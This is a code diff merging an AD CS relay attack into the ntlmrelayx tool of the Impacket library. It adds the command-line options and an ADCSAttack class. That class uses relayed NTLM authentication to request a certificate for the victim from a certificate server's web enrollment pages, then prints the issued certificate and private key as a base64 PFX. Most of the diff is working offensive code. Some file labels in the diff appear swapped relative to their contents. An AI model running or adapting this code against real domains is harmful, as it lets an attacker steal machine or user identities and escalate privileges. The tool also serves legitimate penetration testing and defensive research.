Merge pull request #1101 from ExAndroidDev/ntlmrelayx-adcs-attack

Implementation of AD CS attack in ntlmrelayx.py

Author: 0xdeaddood

examples/ntlmrelayx.py

@@ -164,6 +164,8 @@ def start_servers(options, threads):
         c.setInterfaceIp(options.interface_ip)
         c.setExploitOptions(options.remove_mic, options.remove_target)
         c.setWebDAVOptions(options.serve_image)
+        c.setIsADCSAttack(options.adcs)
+        c.setADCSOptions(options.template)
 
         if server is HTTPRelayServer:
             c.setListeningPort(options.http_port)
@@ -320,6 +322,11 @@ def stop_servers(threads):
     imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump '
         '(0 = unlimited, default: no limit)')
 
+    # AD CS options
+    adcsoptions = parser.add_argument_group("AD CS attack options")
+    adcsoptions.add_argument('--adcs', action='store_true', required=False, help='Enable AD CS relay attack')
+    adcsoptions.add_argument('--template', action='store', metavar="TEMPLATE", required=False, default="Machine", help='AD CS template. If you are attacking Domain Controller or other windows server machine, default value should be suitable.')
+
     try:
        options = parser.parse_args()
     except Exception as e:

impacket/examples/ntlmrelayx/attacks/httpattack.py

@@ -13,39 +13,33 @@
 # Authors:
 #   Alberto Solino (@agsolino)
 #   Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
-#
+#   Ex Android Dev (@ExAndroidDev)
+
 from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
+from impacket.examples.ntlmrelayx.attacks.httpattacks.adcsattack import ADCSAttack
 
 PROTOCOL_ATTACK_CLASS = "HTTPAttack"
 
-class HTTPAttack(ProtocolAttack):
+
+class HTTPAttack(ProtocolAttack, ADCSAttack):
     """
     This is the default HTTP attack. This attack only dumps the root page, though
     you can add any complex attack below. self.client is an instance of urrlib.session
     For easy advanced attacks, use the SOCKS option and use curl or a browser to simply
     proxy through ntlmrelayx
     """
     PLUGIN_NAMES = ["HTTP", "HTTPS"]
-    def run(self):
-        #Default action: Dump requested page to file, named username-targetname.html
 
-        #You can also request any page on the server via self.client.session,
-        #for example with:
-        self.client.request("GET", "/")
-        r1 = self.client.getresponse()
-        print(r1.status, r1.reason)
-        data1 = r1.read()
-        print(data1)
-
-        #Remove protocol from target name
-        #safeTargetName = self.client.target.replace('http://','').replace('https://','')
-
-        #Replace any special chars in the target name
-        #safeTargetName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', safeTargetName)
-
-        #Combine username with filename
-        #fileName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', self.username.decode('utf-16-le')) + '-' + safeTargetName + '.html'
+    def run(self):
 
-        #Write it to the file
-        #with open(os.path.join(self.config.lootdir,fileName),'w') as of:
-        #    of.write(self.client.lastresult)
+        if self.config.isADCSAttack:
+            ADCSAttack._run(self)
+        else:
+            # Default action: Dump requested page to file, named username-targetname.html
+            # You can also request any page on the server via self.client.session,
+            # for example with:
+            self.client.request("GET", "/")
+            r1 = self.client.getresponse()
+            print(r1.status, r1.reason)
+            data1 = r1.read()
+            print(data1)

impacket/examples/ntlmrelayx/attacks/httpattacks/__init__.py

@@ -0,0 +1,88 @@
+# Impacket - Collection of Python classes for working with network protocols.
+#
+# SECUREAUTH LABS. Copyright (C) 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   AD CS relay attack
+#
+# Authors:
+#   Ex Android Dev (@ExAndroidDev)
+#   Tw1sm (@Tw1sm)
+
+import re
+import base64
+from OpenSSL import crypto
+
+from impacket import LOG
+
+# cache already attacked clients
+ELEVATED = []
+
+
+class ADCSAttack:
+
+    def _run(self):
+        key = crypto.PKey()
+        key.generate_key(crypto.TYPE_RSA, 4096)
+
+        if self.username in ELEVATED:
+            LOG.info('Skipping user %s since attack was already performed' % self.username)
+            return
+        csr = self.generate_csr(key, self.username)
+        csr = csr.decode().replace("\n", "").replace("+", "%2b").replace(" ", "+")
+        LOG.info("CSR generated!")
+
+        data = "Mode=newreq&CertRequest=%s&CertAttrib=CertificateTemplate:%s&TargetStoreFlags=0&SaveCert=yes&ThumbPrint=" % (csr, self.config.template)
+
+        headers = {
+            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
+            "Content-Type": "application/x-www-form-urlencoded",
+            "Content-Length": len(data)
+        }
+
+        LOG.info("Getting certificate...")
+
+        self.client.request("POST", "/certsrv/certfnsh.asp", body=data, headers=headers)
+        ELEVATED.append(self.username)
+        response = self.client.getresponse()
+
+        if response.status != 200:
+            LOG.error("Error getting certificate! Make sure you have entered valid certiface template.")
+            return
+
+        content = response.read()
+        found = re.findall(r'location="certnew.cer\?ReqID=(.*?)&', content.decode())
+        if len(found) == 0:
+            LOG.error("Error obtaining certificate!")
+            return
+
+        certificate_id = found[0]
+
+        self.client.request("GET", "/certsrv/certnew.cer?ReqID=" + certificate_id)
+        response = self.client.getresponse()
+
+        LOG.info("GOT CERTIFICATE!")
+        certificate = response.read().decode()
+
+        certificate_store = self.generate_pfx(key, certificate)
+        LOG.info("Base64 certificate of user %s: \n%s" % (self.username, base64.b64encode(certificate_store).decode()))
+
+    def generate_csr(self, key, CN):
+        LOG.info("Generating CSR...")
+        req = crypto.X509Req()
+        req.get_subject().CN = CN
+        req.set_pubkey(key)
+        req.sign(key, "sha256")
+
+        return crypto.dump_certificate_request(crypto.FILETYPE_PEM, req)
+
+    def generate_pfx(self, key, certificate):
+        certificate = crypto.load_certificate(crypto.FILETYPE_PEM, certificate)
+        p12 = crypto.PKCS12()
+        p12.set_certificate(certificate)
+        p12.set_privatekey(key)
+        return p12.export()

impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py

@@ -68,7 +68,10 @@ def sendNegotiate(self,negotiateMessage):
                 self.authenticationMethod = "Negotiate"
         except (KeyError, TypeError):
             LOG.error('No authentication requested by the server for url %s' % self.targetHost)
-            return False
+            if self.serverConfig.isADCSAttack:
+                LOG.info('IIS cert server may allow anonymous authentication, sending NTLM auth anyways')
+            else:
+                return False
 
         #Negotiate auth
         negotiate = base64.b64encode(negotiateMessage).decode("ascii")

impacket/examples/ntlmrelayx/clients/httprelayclient.py

@@ -94,6 +94,10 @@ def __init__(self):
         # WebDAV options
         self.serve_image = False
 
+        # AD CS attack options
+        self.isADCSAttack = False
+        self.template = None
+
     def setSMBChallenge(self, value):
         self.SMBServerChallenge = value
 
@@ -208,3 +212,9 @@ def setExploitOptions(self, remove_mic, remove_target):
 
     def setWebDAVOptions(self, serve_image):
         self.serve_image = serve_image
+
+    def setADCSOptions(self, template):
+        self.template = template
+
+    def setIsADCSAttack(self, isADCSAttack):
+        self.isADCSAttack = isADCSAttack

impacket/examples/ntlmrelayx/utils/config.py

@@ -65,7 +65,7 @@ def read(fname):
                 'impacket.krb5', 'impacket.ldap', 'impacket.examples.ntlmrelayx',
                 'impacket.examples.ntlmrelayx.clients', 'impacket.examples.ntlmrelayx.servers',
                 'impacket.examples.ntlmrelayx.servers.socksplugins', 'impacket.examples.ntlmrelayx.utils',
-                'impacket.examples.ntlmrelayx.attacks'],
+                'impacket.examples.ntlmrelayx.attacks', 'impacket.examples.ntlmrelayx.attacks.httpattacks'],
       scripts = glob.glob(os.path.join('examples', '*.py')),
       data_files = data_files,
       install_requires=['pyasn1>=0.2.3', 'pycryptodomex', 'pyOpenSSL>=0.16.2', 'six', 'ldap3>=2.5,!=2.5.2,!=2.5.0,!=2.6',